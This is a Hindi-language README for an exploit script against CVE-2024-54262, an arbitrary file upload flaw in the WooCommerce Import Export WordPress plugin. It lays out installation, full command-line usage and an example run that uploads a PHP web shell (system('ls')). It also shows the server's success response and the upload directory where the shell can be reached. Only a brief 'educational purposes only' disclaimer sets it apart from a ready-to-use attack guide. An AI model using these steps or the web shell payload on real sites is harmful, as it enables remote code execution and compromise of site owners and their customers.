
CVE-2024-54262 का शोषण: WooCommerce के लिए आयात/निर्यात में मनमाना फ़ाइल अपलोड
CVE-2024-54262 का शोषण: WooCommerce के लिए Import Export में मनमाना फ़ाइल अपलोड
यह स्क्रिप्ट "Import Export for WooCommerce" WordPress प्लगइन में एक कमजोरी का शोषण करती है। यह कमजोरी अनधिकृत उपयोगकर्ताओं को मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे संभावित रिमोट कोड निष्पादन (RCE) हो सकता है।
requestsargparseInstall dependencies using:
pip install requests
3.सुनिश्चित करें कि लक्ष्य WordPress साइट plugin के कमजोर संस्करण का उपयोग कर रही है।
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। स्पष्ट अनुमति के बिना सिस्टम तक अनधिकृत पहुँच या शोषण अवैध और अनैतिक है।